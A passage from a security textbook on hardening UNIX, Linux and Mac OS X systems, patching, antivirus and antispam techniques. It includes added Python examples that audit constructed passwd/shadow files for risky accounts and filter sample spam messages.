Accounts on a UNIX system can also be controlled via GUIs in some cases and command-line interfaces in others. On most popular UNIX versions, the user information can be found in the passwd file located in the /etc directory. By manually editing this file, you can add, delete, or modify user accounts on the system. By examining this file, an administrator can see which user accounts exist on the system and then determine which accounts to remove or disable. On most UNIX systems, if you remove the user account from the passwd file, you must manually remove any files that belong to that user, including home directories. Most modern UNIX versions store the actual password associated with a user account in a shadow file located in the /etc directory. The shadow file contains the actual password hashes for each user account and is readable only by the root user (or a process with root-level permissions). How you patch a UNIX system depends a great deal on the UNIX version in use and the patch being applied. In some cases, a patch will consist of a series of manual steps requiring the administrator to replace files, change permissions, and alter directories. In other cases, the patches are executable scripts or utilities that perform the patch actions automatically. Some UNIX versions, such as Red Hat and Solaris, have built-in utilities that handle the patching process. In those cases, the administrator downloads a specifically formatted file that the patching utility then processes to perform any modifications or updates that need to be made. To better illustrate UNIX baselines, we will examine two popular UNIX-based operating systems: Solaris and Red Hat Linux.
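The account review described above (reading /etc/passwd together with /etc/shadow to decide which accounts to remove or disable) as an added example, not code from the book. The passwd and shadow content is constructed, the password hashes are placeholders, and the set of "no login" shells is an assumption about common defaults.

```python
"""Added example (not from the book): review constructed /etc/passwd and
/etc/shadow content for accounts an administrator should look at while
baselining. Uses the standard 7-field passwd and 9-field shadow layouts;
hash values are placeholders, never real credentials.
"""
from typing import Dict, List

# Constructed sample data; 'toor' (a second UID 0), 'guest' (empty password
# field) and 'olduser' (locked with '!') are the cases worth catching.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
toor:x:0:0:spare admin:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
guest:x:1001:1001:Guest:/home/guest:/bin/bash
olduser:x:1002:1002:Former staff:/home/olduser:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$HASHPLACEHOLDER:16000:0:99999:7:::
bin:*:16000:0:99999:7:::
daemon:*:16000:0:99999:7:::
ftp:*:16000:0:99999:7:::
toor:$6$saltsalt$HASHPLACEHOLDER:16000:0:99999:7:::
alice:$6$saltsalt$HASHPLACEHOLDER:16000:0:99999:7:::
guest::16000:0:99999:7:::
olduser:!$6$saltsalt$HASHPLACEHOLDER:16000:0:99999:7:::
"""

# Assumed set of shells that deny interactive login on common distributions.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def parse_passwd(text: str) -> Dict[str, dict]:
    """name -> {uid, gid, home, shell}; skips blank and comment lines."""
    accounts = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        accounts[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return accounts


def parse_shadow(text: str) -> Dict[str, str]:
    """name -> password field: a hash, '*' (no login), '!'-prefixed (locked), or ''."""
    result = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, pw = line.split(":")[:2]
        result[name] = pw
    return result


def review_accounts(passwd_text: str, shadow_text: str) -> Dict[str, List[str]]:
    """Group accounts into findings an administrator should act on or confirm."""
    passwd = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    findings: Dict[str, List[str]] = {
        "extra_uid0": [],            # any UID 0 account other than root
        "empty_password_login": [],  # login shell and no password set at all
        "locked_candidates": [],     # locked accounts still holding a login shell
        "interactive": [],           # every account that can log in; confirm each
    }
    for name, info in sorted(passwd.items()):
        pw = shadow.get(name, "")
        can_login = info["shell"] not in NOLOGIN_SHELLS
        if info["uid"] == 0 and name != "root":
            findings["extra_uid0"].append(name)
        if can_login:
            findings["interactive"].append(name)
            if pw == "":
                findings["empty_password_login"].append(name)
            if pw.startswith("!"):
                findings["locked_candidates"].append(name)
    return findings


if __name__ == "__main__":
    for finding, names in review_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{finding}: {', '.join(names) or '-'}")
```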
Tech Tip
TCP Wrappers
TCP wrappers can be a great additional layer of protection for UNIX systems. When creating a security baseline for UNIX systems, be sure to consider the use of TCP wrappers.
Another method of examining a system for vulnerabilities is done through observation—monitoring network traffic from specific systems, for example. This is called passive vulnerability scanning, as administrators are merely observing what the system does and how it behaves. For instance, if an administrator sees FTP traffic traveling to a dedicated mail server, then they know they need to examine and possibly disable that FTP service.
Pluggable Authentication Modules (PAM) are a mechanism for providing interoperation and secure access to a variety of services on different platforms. They provide a common authentication scheme that can be used with a wide variety of applications. PAM has an extensive documentation set with details about both using PAM and writing modules to integrate PAM with applications.
Hardening Linux
Linux is a rather unique operating system. It is UNIX-based, very powerful, open source, can be obtained for free, and is available in many different "versions" or distributions ("distros") from several vendors. Linux was initially conceived and written by Linus Torvalds in 1991. His concept of creating a lightweight, flexible, and free operating system gave rise to an entirely new operating system that is very popular and is installed on millions of computers around the world. Due to its open nature, the entire source-code base for the operating system is available to anyone who wants to examine it, modify it, or recompile it for their own specific uses. Linux is a favored operating system among many security professionals, system administrators, and other highly technical users who enjoy the flexibility and power that Linux provides.
Many Linux distributions are "open source," meaning if you have the time, energy, and expertise, you can access and modify the code that comprises the operating system itself.
While most versions of Linux can be obtained for free simply by downloading them from the Internet (including major commercial distributions), you can also purchase commercial versions of the Linux operating system from vendors, such as Red Hat, Slackware, SuSE, and Debian, who have built a business out of providing custom versions of Linux along with support and training. We will use Fedora, a popular (and free) Linux distribution, as the example for the rest of this section. Regardless of which Linux version you prefer, baselining a Linux system follows the same guidelines as any other UNIX system: disable unnecessary services, restrict permissions on files and directories, remove unnecessary software, apply patches, remove unnecessary users, and apply password guidelines. Services under Linux are normally controlled by their own configuration files or by xinetd, the extended Internet services daemon. Instead of starting all Internet services, such as FTP servers, at system startup, some Linux distributions use xinetd to listen for incoming connections. Xinetd listens to all the appropriate ports (those that match the services in its configuration files), and when a connection request comes in, xinetd starts the appropriate server and hands over the connection request. This "master process" approach makes it fairly simple to disable unwanted services—all the configuration information for each server is located in /etc/xinetd.d, with a configuration file for each process. Permissions under Linux are the same as for other UNIX-based operating systems. There are permissions for owner, group, and others (or world). Permissions are based on the same read-write-execute principle and can be adjusted using the chmod command. Individual and group ownership information can be changed using chown and chgrp, respectively. As with other baselining exercises, permissions should be as restrictive as functionally possible, giving read-only access when possible and write or execute access when necessary.
Tech Tip
Linux Variants
The original Linux code is open source, and from this code many diverse variants have been developed. While these are all very similar, there are differences in how developers approached some activities such as patching and source code repositories. The different distros of Linux and the methods of applying updates to them are related to the lineage of the Linux distro itself. For distros that derive from the Debian line (Debian, Ubuntu, Linux Mint), the file format .deb is used. For distros derived from Red Hat (Red Hat, RHEL, Fedora, CentOS, SUSE), the .rpm file structure is used. The two formats, .deb and .rpm, are basically archive files with metadata to assist installers. The differences are noticeable when a user uses tools to apply the updates. The underlying tool for .deb is dpkg, and rpm for .rpm. But these are simple tools, not repository managers; for repository management and better functionality, apt-get is used with .deb and yum is used with .rpm. Although each of these options is different in usage and each has its champions, at the end of the day, both paths provide the same services for administrators. The key takeaway is that although similar, there are differences in versions of Linux that make administration less universal in process.
Adding and removing software under Linux is typically done through a package manager. In Fedora Core Linux, the package manager is called Red Hat Package Manager, or rpm for short. Using rpm, you can add, modify, update, or remove software packages from your system. Using the rpm -qa command will give you a list of all the software packages installed on your Red Hat system. You can remove any packages you do not wish to leave installed by using the rpm -e command. As with most things under Linux, there is a GUI-based utility to accomplish this same task. The GUI-based Add/Remove Software utility is shown in Figure 14.6.
• Figure 14.6 Fedora Add/Remove Software utility
Patching and keeping a Fedora Linux system up to date is a fairly simple exercise, as well. Fedora has provided an Update Agent that, once configured, will examine your system, obtain the list of available updates, and, if desired, install those updates on your system. Like any other operating system, it is important to maintain the patch level of your Fedora system. For more information on the Fedora Update Agent, see the "Updates (a.k.a. Hotfixes, Service Packs, and Patches)" section later in this chapter. Managing and maintaining user accounts under Linux can be accomplished with either the command line or a GUI. Unlike certain other operating systems, there's really only one default account for Linux systems—the root, or superuser, account. The root account has complete and total control over the system and should therefore be protected with an exceptionally strong password. Many administrators will configure their systems to prevent anyone from logging in directly as root; instead they must log in with their own personal accounts and switch to the root account using the su command. Adding user accounts can be done with the useradd command, and unwanted user accounts can be removed using the userdel command. Additionally, you can manually edit /etc/passwd to add or remove user accounts. User accounts can also be managed via a GUI, as shown in Figure 14.7.
• Figure 14.7 Fedora User Manager
For increased local security, Fedora also provides a built-in firewall function that can be managed either via the command line or through a GUI, as shown in Figure 14.8. To protect network access to the local system, administrators can control which ports external users may connect to, such as mail, FTP, or web. Administrators may choose a security level, from high, medium, off, or a customized option that enables them to individually select which ports on which interfaces external users may connect to.
• Figure 14.8 Fedora Firewall Configuration GUI
In addition to the built-in firewall functions, administrators may also use TCP wrappers like those discussed earlier in this chapter. By specifying host and port combinations in /etc/hosts.allow, administrators can allow certain hosts to connect on certain ports. The firewall function and hosts.allow must work together if both functions are used on the same system. The connection must be allowed by both utilities or it will be dropped.
Hardening Mac OS X
Apple's operating system is essentially a new variant of the UNIX operating system. While this POSIX-compliant OS brings a new level of power, flexibility, and stability to Mac users everywhere, it also brings a new level of security concerns. Traditionally, the Mac operating system was largely ignored by the hacker community—the deployment was relatively small and largely restricted to individual users or departments. With the migration to a UNIX-based OS and a rise in the number of Macs on the market, Mac users should anticipate a sharp increase in unwanted attention and scrutiny from potential attackers. Because it is a UNIX-based OS, the same rough guidelines for all UNIX systems apply to Mac OS X. Apple has included some security-specific features to help protect its user base:
Mandatory access controls for access to system resources: Only processes that are explicitly granted access are allowed to access system resources such as networking, file systems, process execution, and so on.
Tagged downloads: Any file downloaded with Safari, iChat, or Mail is automatically tagged with metadata, including the source URL, date and time of download, and so on. If the download was an archive (such as a zip file), the same metadata is tagged to any file extracted from the archive. Users are prompted with this information the first time they try to run or open the downloaded file.
Execute disable: Leopard (OS X 10.5) and beyond provides no-execute stack protection. Essentially this means that certain portions of the stack have been marked as "data only" and the OS will not execute any instructions in regions marked as data only. This helps protect against buffer-overflow attacks.
Library randomization: In another attempt to help defeat buffer-overflow attacks, Leopard (OS X 10.5) and beyond loads system libraries into random locations, making it harder for attackers to reference static system library locations in their exploit code.
FileVault: FileVault encrypts files with AES encryption. When this feature is enabled, everything in the user's home directory is automatically encrypted.
Application-aware firewall: The Apple Application firewall allows users to restrict network access on both a per-application and a per-port basis.
Pre-emptive multitasking and memory protection: These features provide a means for the system to ensure that multiple applications can be run simultaneously without interrupting or corrupting each other.
Gatekeeper: The Gatekeeper application is employed to make it safer to download and deploy applications. The combination of the Gatekeeper application and the control Apple exerts over applications in its App Store provides one of the safest sets of software distribution.
App Sandbox: The App Sandbox in OS X provides a means of ensuring that apps are separated from the OS in ways to protect critical components from malicious software.
File permissions in OS X are nearly identical to those in any other UNIX variant and are based on separate read, write, and execute permissions for owner, group, and world. While these permissions can be adjusted manually from a command-line interface, with the standard chown, chmod, and chgrp commands, Apple again provides some nice interface capabilities for viewing and managing file and directory permissions. By selecting the properties of any given file or folder, the user can view and modify the permissions for that file or folder, as shown in Figure 14.9. Note that the GUI follows the same user-group-world pattern of permissions that other UNIX variants follow, though Apple uses the term others as opposed to world.
• Figure 14.9 Setting file permissions in Mac OS X
This GUI allows users to restrict access to sensitive files and directories quickly and effectively. By default, OS X limits a user's ability to access or modify certain areas of the file system, including those areas containing system binaries. However, these restrictions can be circumvented by a user with the appropriate permissions or by certain third-party applications. Removing unwanted or unnecessary programs in OS X is usually done through the program's own uninstaller utility or by simply using the Finder to locate and then delete the folder containing the program and associated utilities. Like Windows, OS X maps certain file extensions to specific programs, so deleting a program that handles specific extension types may require that an administrator clear up associated extensions.
Like most UNIX-based OSs, OS X is a multiuser platform. As part of the baselining effort, the active user accounts should be examined to ensure they have the right level of access, permissions, group memberships, and so on. Mac OS X also permits administrators to lock accounts so that they can be modified only by users with administrative-level privileges.
There are three types of accounts in OS X: User, Administrator, and Root. User is the account with the lowest privileges, and typical "users" should be given this type of account. Administrator accounts have "root-like" permissions except they cannot add, modify, or delete files in the system domain. The Root account is essentially the same as the root account on any UNIX system; however, OS X disables the Root account by default. You must enable the Root account if you want to use it on a Mac.
Updates (a.k.a. Hotfixes, Service Packs, and Patches)
Operating systems are large and complex mixes of interrelated software modules written by dozens or even thousands of separate individuals. With the push toward GUI-based functionality and enhanced capabilities that has occurred over the past several years, operating systems have continued to grow and expand. Windows Vista contains approximately 50 million lines of code, and though it may be one of the largest in that respect, other modern operating systems are not far behind. As operating systems continue to grow and introduce new functions, the potential for problems with the code grows as well. It is almost impossible for an operating system vendor to test its product on every possible platform under every possible circumstance, so functionality and security issues do arise after an operating system has been released. To the average user or system administrator, this means a fairly constant stream of updates designed to correct problems, replace sections of code, or even add new features to an installed operating system.
Vendors typically follow a hierarchy for software updates:
Hotfix: This is a term given to a (usually) small software update designed to address a specific problem, such as a buffer overflow in an application that exposes the system to attacks. Hotfixes are typically developed in reaction to a discovered problem and are produced and then released rather quickly. Hotfixes typically address critical, security-related issues and should be applied to the affected application or operating system as soon as possible.
Patch: This term is usually applied to a more formal, larger software update that may address several or many software problems. Patches often contain enhancements or additional capabilities as well as fixes for known bugs. Patches are usually developed over a longer period of time.
Service pack: This term is usually given to a large collection of patches and hotfixes rolled into a single, rather large package. Service packs are designed to bring a system up to the latest known good level all at once, rather than requiring the user or system administrator to download dozens or hundreds of updates separately.
Every operating system, from Linux to Solaris to Windows, requires software updates, and each operating system has different methods of assisting users in keeping their systems up to date. Microsoft, for example, typically makes updates available for download from its website. While most administrators or technically proficient users may prefer to identify and download updates individually, Microsoft recognizes that nontechnical users prefer a simpler approach, which Microsoft has built into its operating systems. Beginning with Windows Vista, and Server 2003, Microsoft provides an automated update functionality that will, once configured, locate any required updates, download them to your system, and even install the updates if that is your preference. Figure 14.10 shows the Automatic Updates window, which can be found in the Control Panel. Note that both the web-based updates and Automatic Updates require active Internet connections to retrieve information and updates from Microsoft.
• Figure 14.10 Automatic Updates settings in Windows 7
The Windows Update utility (see Figure 14.11) can perform an on-demand search for updates or be configured to scan for, download, and even install updates automatically—essentially the same functions as Automatic Updates with a new look. An especially nice feature of Windows Update is the ability to scan for and download patches for other Microsoft software, such as Office, as well as updates and patches for the operating system itself.
• Figure 14.11 Windows Update utility in Windows 7
Microsoft is not alone in providing utilities to assist users in keeping their systems up to date and secure. Fedora Linux contains a utility called the Package Updater, shown in Figure 14.12, which does essentially the same thing. Running the utility will show you which updates are available and allow you to select which updates to download and apply. As with most operating systems, you can configure Fedora to automatically download and apply available updates.
• Figure 14.12 Fedora software package update utility
Regardless of the method you use to update the operating system, it is critically important to keep systems up to date. New security advisories come out every day, and while a buffer overflow may be a “potential” problem today, it will almost certainly become a “definite” problem in the near future. Much like the steps taken to baseline and initially secure an operating system, keeping every system patched and up to date is critical to protecting the system and the information it contains.
Exam Tip: All software will require changes/patches over time. Managing patches is an essential element of a security program.
Operating System Patching
Every OS, from Linux to Windows, requires software updates, and each OS has different methods of assisting users in keeping their systems up to date. Microsoft, for example, typically makes updates available for download from its website. While most administrators or technically proficient users may prefer to identify and download updates individually, Microsoft recognizes that nontechnical users prefer a simpler approach, which Microsoft has built into its operating systems. In Windows 7 and 8 and Windows Server 2012, Microsoft provides an automated update functionality that will, once configured, locate any required updates, download them to your system, and even install the updates if that is your preference. In Microsoft Windows, the Windows Update utility (see Figure 14.11) can perform an on-demand search for updates or be configured to scan for, download, and even install updates automatically—essentially the same functions as Automatic Updates with a new look. An especially nice feature of Windows Update is the ability to scan for and download patches for other Microsoft software, such as Office, as well as updates and patches for the OS itself.
Tech Tip: Windows Updates of the Future
Microsoft has announced that beginning with Windows 10 it will discontinue the monthly patch distribution process referred to as Patch Tuesday. The new method will be continuous, seamless updates in the background. This has raised questions in enterprises as to how they can test updates before applying them in production.
How you patch a Linux system depends a great deal on the specific version in use and the patch being applied. In some cases, a patch will consist of a series of manual steps requiring the administrator to replace files, change permissions, and alter directories. In other cases, the patches are executable scripts or utilities that perform the patch actions automatically. Some Linux versions, such as Red Hat, have built-in utilities that handle the patching process. In those cases, the administrator downloads a specifically formatted file that the patching utility then processes to perform any modifications or updates that need to be made. Regardless of the method you use to update the OS, it is critically important to keep systems up to date. New security advisories come out every day, and while a buffer overflow may be a “potential” problem today, it will almost certainly become a “definite” problem in the near future. Much like the steps taken to baseline and initially secure an OS, keeping every system patched and up to date is critical to protecting the system and the information it contains.
Application Updates
Just as operating systems need patches, so do applications. Managing the wide variety of applications and the required updates from numerous different software vendors can be a daunting challenge. This has created a niche market for patch-management software. In most enterprises, some form of automated patch management solution is used, both to reduce labor and to ensure updates are applied appropriately across the enterprise.
Antimalware
In the early days of PC use, threats were limited: most home users were not connected to the Internet 24/7 through broadband connections, and the most common threat was a virus passed from computer to computer via an infected floppy disk (much like the medical definition, a computer virus is something that can infect the host and replicate itself). But things have changed dramatically since those early days, and current threats pose a much greater risk than ever before. According to SANS Internet Storm Center, the average survival time of an unpatched Windows PC on the Internet is less than 60 minutes (http://isc.sans.org/survivaltime.html). This is the estimated time before an automated probe finds the system, penetrates it, and compromises it. Automated probes from botnets and worms are not the only threats roaming the Internet—there are viruses and malware spread by e-mail, phishing, infected websites that execute code on your system when you visit them, adware, spyware, and so on. Fortunately, as the threats increase in complexity and capability, so do the products designed to stop them.
Cross Check: Malware
Malware comes in many forms and is covered specifically in Chapter 15. Antivirus solutions and proper workstation configurations are part of a defensive posture against various forms of malware. Additional steps include policy and procedure actions, prohibiting file sharing via USB or external media, and prohibiting access to certain websites.
Antivirus
Antivirus (AV) products attempt to identify, neutralize, or remove malicious programs, macros, and files. These products were initially designed to detect and remove computer viruses, though many of the antivirus products are now bundled with additional security products and features. Although antivirus products have had over two decades to refine their capabilities, the purpose of the antivirus products remains the same: to detect and eliminate computer viruses and malware. Most antivirus products combine the following approaches when scanning for viruses:
Signature-based scanning: Much like an intrusion detection system (IDS), the antivirus products scan programs, files, macros, e-mails, and other data for known worms, viruses, and malware. The antivirus product contains a virus dictionary with thousands of known virus signatures that must be frequently updated, as new viruses are discovered daily. This approach will catch known viruses but is limited by the virus dictionary—what it does not know about it cannot catch.
Heuristic scanning (or analysis): Heuristic scanning does not rely on a virus dictionary. Instead, it looks for suspicious behavior—anything that does not fit into a “normal” pattern of behavior for the OS and applications running on the system being protected.
Most current antivirus software packages provide protection against a wide range of threats, including viruses, worms, Trojans, and other malware. Use of an up-to-date antivirus package is essential in the current threat environment.
Exam Tip: Heuristic scanning is a method of detecting potentially malicious or “virus-like” behavior by examining what a program or section of code does. Anything that is “suspicious” or potentially “malicious” is closely examined to determine whether or not it is a threat to the system. Using heuristic scanning, an antivirus product attempts to identify new viruses or heavily modified versions of existing viruses before they can damage your system.
As signature-based scanning is a familiar concept, let’s examine heuristic scanning in more detail. Heuristic scanning typically looks for commands or instructions that are not normally found in application programs, such as attempts to access a reserved memory register. Most antivirus products use either a weight-based system or a rule-based system in their heuristic scanning (more effective products use a combination of both techniques). A weight-based system rates every suspicious behavior based on the degree of threat associated with that behavior. If the set threshold is passed based on a single behavior or a combination of behaviors, the antivirus product will treat the process, application, macro, and so on that is performing the behavior(s) as a threat to the system. A rule-based system compares activity to a set of rules meant to detect and identify malicious software. If part of the software matches a rule, or if a process, application, macro, and so on performs a behavior that matches a rule, the antivirus software will treat that as a threat to the local system. Some heuristic products are very advanced and contain capabilities for examining memory usage and addressing, a parser for examining executable code, a logic flow analyzer, and a disassembler/emulator so they can “guess” what the code is designed to do and whether or not it is malicious.
Computer virus writers’ intentions have changed over the years, from simply spreading a virus and wanting to be noticed, to today’s stealthy botnet-creating criminals. One method of remaining hidden is to produce viruses that can morph to lower their detection rates by standard antivirus programs. The number of variants for some viruses has increased from less than 10 to greater than 10,000. This explosion in signatures has created two issues. One, users must constantly (sometimes more than daily) update their signature file. And, more importantly, detection methods are having to change as the number of signatures becomes too large to scan quickly. For end users, the bottom line is simple: update signatures automatically, and at least daily.
As with IDS/IPS products, encryption and obfuscation pose a problem for antivirus products: anything that cannot be read cannot be matched against current virus dictionaries or activity patterns. To combat the use of encryption in malware and viruses, many heuristic scanners look for encryption and decryption loops. As malware is usually designed to run alone and unattended, if it uses encryption, it must contain all the instructions to encrypt and decrypt itself as needed. Heuristic scanners look for instructions such as the initialization of a pointer with a valid memory address, manipulation of a counter, or a branch condition based on a counter value. While these actions don’t always indicate the presence of an encryption/decryption loop, if the heuristic engine can find a loop, it might be able to decrypt the software in a protected memory space, such as an emulator, and evaluate the software in more detail. Many viruses share common encryption/decryption routines that help antivirus developers.
Current antivirus products are highly configurable and most offerings will have the following capabilities:
Automated updates: Perhaps the most important feature of a good antivirus solution is its ability to keep itself up to date by automatically downloading the latest virus signatures on a frequent basis. This usually requires that the system be connected to the Internet in some fashion and that updates be performed on a daily (or more frequent) basis.
Automated scanning: Most antivirus products allow for the scheduling of automated scans so that you can designate when the antivirus product will examine the local system for infected files. These automated scans can typically be scheduled for specific days and times, and the scanning parameters can be configured to specify what drives, directories, and types of files are scanned.
Media scanning: Removable media is still a common method for virus and malware propagation, and most antivirus products can be configured to automatically scan optical media, USB drives, memory sticks, or any other type of removable media as soon as they are connected to or accessed by the local system.
Manual scanning: Many antivirus products allow the user to scan drives, files, or directories (folders) “on demand.”
E-mail scanning: E-mail is still a major method of virus and malware propagation. Many antivirus products give users the ability to scan both incoming and outgoing messages as well as any attachments.
Resolution: When the antivirus product detects an infected file or application, it can typically perform one of several actions. The antivirus product may quarantine the file, making it inaccessible; it may try to repair the file by removing the infection or offending code; or it may delete the infected file. Most antivirus products allow the user to specify the desired action, and some allow for an escalation in actions such as cleaning the infected file if possible and quarantining the file if it cannot be cleaned.
Antivirus solutions are typically installed on individual systems (desktops, servers, and even mobile devices), but network-based antivirus capabilities are also available in many commercial gateway products. These gateway products often combine firewall, IDS/IPS, and antivirus capabilities into a single integrated platform. Most organizations will also employ antivirus solutions on e-mail servers, as that continues to be a very popular propagation method for viruses. While the installation of a good antivirus product is still considered a necessary best practice, there is growing concern about the effectiveness of antivirus products against developing threats. Early viruses often exhibited destructive behaviors; were poorly written, modified files; and were less concerned with hiding their presence than they were with propagation. We are seeing an emergence of viruses and malware created by professionals, sometimes financed by criminal organizations or governments, which go to great lengths to hide their presence. These viruses and malware are often used to steal sensitive information or turn the infected PC into part of a larger botnet for use in spamming or attack operations.
Exam Tip: Antivirus is an essential security application on all platforms. There are compliance schemes that mandate antivirus deployment, such as PCI DSS and NERC CIP.
Antivirus Software for Servers
The need for antivirus protection on servers depends a great deal on the use of the server. Some types of servers, such as e-mail servers, require extensive antivirus protection because of the services they provide. Other servers (domain controllers and remote access servers, for example) may not require any antivirus software, as they do not allow users to place files on them. File servers need protection, as do certain types of application servers. There is no general rule, so each server and its role in the network will need to be examined to determine whether it needs antivirus software.
Antivirus Software for Workstations
Antivirus packages are available from a wide range of vendors. Running a network of computers without this basic level of protection will be an exercise in futility. Even though the number of widespread, indiscriminate broadcast virus attacks has decreased because of the effectiveness of antivirus software, it is still necessary to use antivirus software; the time and money you would spend cleaning up after a virus attack more than equals the cost of antivirus protection. The majority of viruses today exist to create zombie machines for botnets that enable others to control resources on your PC. Even more important, once connected by networks, computers can spread a virus from machine to machine with an ease that’s even greater than simple USB flash drive transfer. One unprotected machine can lead to problems throughout a network as other machines have to use their antivirus software to attempt to clean up a spreading infection. Apple Mac computers were once considered by many users to be immune because very few examples of malicious software targeting Macs existed. This was not due to anything other than a low market share, and hence the devices were ignored by the malware community as a whole. As Mac has increased in market share, so has its exposure, and today a variety of Mac OS X malware steals files and passwords and is even used to take users’ pictures with the computer’s built-in webcam. All user machines need to install antivirus software in today’s environment, because any computer can become a target.
Antispam
If you have an e-mail account, you’ve likely received spam, that endless stream of unsolicited, electronic junk mail advertising get-rich-quick schemes, asking you to validate your bank account’s password, or inviting you to visit one website or another. Despite federal legislation (such as the CAN-SPAM Act of 2003) and promises from IT industry giants like Bill Gates (“Two years from now, spam will be solved”—2004), spam is alive and well and filling up your inbox as you read this. Industry experts have been fighting the spam battle for years, and while significant progress has been made in the development of antispam products, unfortunately the spammers have proven to be very creative and very dedicated in their quest to fill your inbox.
Spam is not a new problem. It’s reported that the first spam message was sent on May 1, 1978 by a Digital Equipment Corporation sales representative. This sales representative attempted to send a message to all ARPANET users on the West Coast.
Antispam products attempt to filter out that endless stream of junk e-mail so you don’t have to. Some antispam products operate at the corporate level, filtering messages as they enter or leave designated mail servers. Other products operate at the host level, filtering messages as they come into your personal inbox. Most antispam products use similar techniques and approaches for filtering out spam:
Blacklisting: Several organizations maintain lists of servers or domains that generate or have generated spam. Most gateway- or server-level products can reference these blacklists and automatically reject any mail coming from servers or domains on the blacklists.
Header filtering: The antispam products look at the message headers to see if they are forged. E-mail headers typically contain information such as sender, receiver, servers used to transmit the message, and so on. Spammers often forge information in message headers in an attempt to hide where the message is really coming from.
Content filtering: The content of the message is examined for certain keywords or phrases that are common to spam but rarely seen in legitimate e-mails (“get rich now” for example). Unfortunately, content filtering does occasionally flag legitimate messages as spam.
Language filtering: Some spam products allow you to filter out e-mails written in certain languages.
User-defined filtering: Most antispam products allow end users to develop their own filters, such as always allowing e-mail from a specific source even if it would normally be blocked by a content filter.
Trapping: Some products will monitor unpublished e-mail addresses for incoming spam—anything sent to an unpublished and otherwise unused account is likely to be spam.
Enforcing the specifications of the protocol: Some spam-generation tools don’t properly follow the SMTP protocol. By enforcing the technical requirements of SMTP, some spam can be rejected as delivery is attempted.
Egress filtering: This technique scans mail as it leaves an organization to catch spam before it is sent to other organizations.
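The filtering techniques listed above, chained the way a gateway product applies them, as an added example that is not from the textbook or any vendor's product: blacklisting, header filtering, content filtering, and a user-defined allow rule that overrides only the content filter. All domains, addresses, phrases and messages are constructed sample data, and the "sender domain must match the first relay" header test is a deliberate simplification of what real products do.

```python
"""Added example (not from the textbook): a small gateway-style antispam
filter chaining blacklisting, header filtering, content filtering and a
user-defined allow rule. All data below is constructed sample data."""
import re
from email import message_from_string
from email.utils import parseaddr

BLACKLISTED_DOMAINS = {"bulk-offers.example", "cheap-pills.example"}  # constructed
SPAM_PHRASES = ("get rich now", "act now", "validate your password")  # constructed
USER_ALLOW_LIST = {"newsletter@vendor.example"}                       # constructed

def sender_address(msg):
    """Address part of the From: header, lower-cased ('' if absent)."""
    return parseaddr(msg.get("From", ""))[1].lower()

def sender_domain(msg):
    return sender_address(msg).rpartition("@")[2]

def relay_hosts(msg):
    """Host names from 'Received: from <host>' headers, latest hop first."""
    hosts = []
    for value in msg.get_all("Received", []):
        m = re.match(r"\s*from\s+([\w.-]+)", value)
        if m:
            hosts.append(m.group(1).lower())
    return hosts

def check_blacklist(msg):
    """Blacklisting: reject if the sender domain or any relay host is listed."""
    for name in [sender_domain(msg)] + relay_hosts(msg):
        if name in BLACKLISTED_DOMAINS or any(
                name.endswith("." + d) for d in BLACKLISTED_DOMAINS):
            return "blacklisted domain " + name
    return None

def check_headers(msg):
    """Header filtering (simplified): the first relay that handled the message
    should belong to the From: domain; otherwise treat the From: as forged."""
    relays = relay_hosts(msg)
    if not relays:
        return "no Received header"
    origin, domain = relays[-1], sender_domain(msg)   # innermost hop = origin
    if domain and origin != domain and not origin.endswith("." + domain):
        return "From domain %s does not match origin relay %s" % (domain, origin)
    return None

def check_content(msg):
    """Content filtering: spam phrases in the subject or a single-part body."""
    body = "" if msg.is_multipart() else msg.get_payload()
    text = (msg.get("Subject", "") + " " + body).lower()
    hits = [p for p in SPAM_PHRASES if p in text]
    return "spam phrases: " + ", ".join(hits) if hits else None

def classify(raw):
    """Return ('spam' or 'ham', reason) for one raw message."""
    msg = message_from_string(raw)
    for check in (check_blacklist, check_headers):
        reason = check(msg)
        if reason:
            return ("spam", reason)
    reason = check_content(msg)
    if reason and sender_address(msg) in USER_ALLOW_LIST:
        return ("ham", "user-defined allow rule overrides content filter")
    if reason:
        return ("spam", reason)
    return ("ham", "passed all filters")

# Constructed sample messages (one Received: hop each, our gateway's view).
SAMPLE_HAM = """\
Received: from mail.corp.example (mail.corp.example [203.0.113.5]) by gw.corp.example
From: Alice <alice@corp.example>
To: bob@corp.example
Subject: Quarterly report

Please review the attached figures before Friday.
"""
SAMPLE_BLACKLISTED = """\
Received: from mx1.bulk-offers.example (mx1.bulk-offers.example [198.51.100.9]) by gw.corp.example
From: deals@bulk-offers.example
To: bob@corp.example
Subject: Special offer

Limited time only.
"""
SAMPLE_FORGED = """\
Received: from relay77.randomhost.example (relay77.randomhost.example [198.51.100.40]) by gw.corp.example
From: security@bank.example
To: bob@corp.example
Subject: Account notice

Please validate your password at the link below.
"""
SAMPLE_KEYWORDS = """\
Received: from mail.shop.example (mail.shop.example [203.0.113.80]) by gw.corp.example
From: promo@shop.example
To: bob@corp.example
Subject: Get rich now with our program

Act now!
"""
SAMPLE_ALLOWED = """\
Received: from mail.vendor.example (mail.vendor.example [203.0.113.90]) by gw.corp.example
From: newsletter@vendor.example
To: bob@corp.example
Subject: Act now: early-bird pricing ends Friday

Renewal details inside.
"""
```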
Cross Check: Spam
The topic of spam and all the interesting details of undesired e-mail is presented in Chapter 16. Spam is listed here as it is considered a client threat, but the main methods of combating spam are covered in Chapter 16.
Antispyware
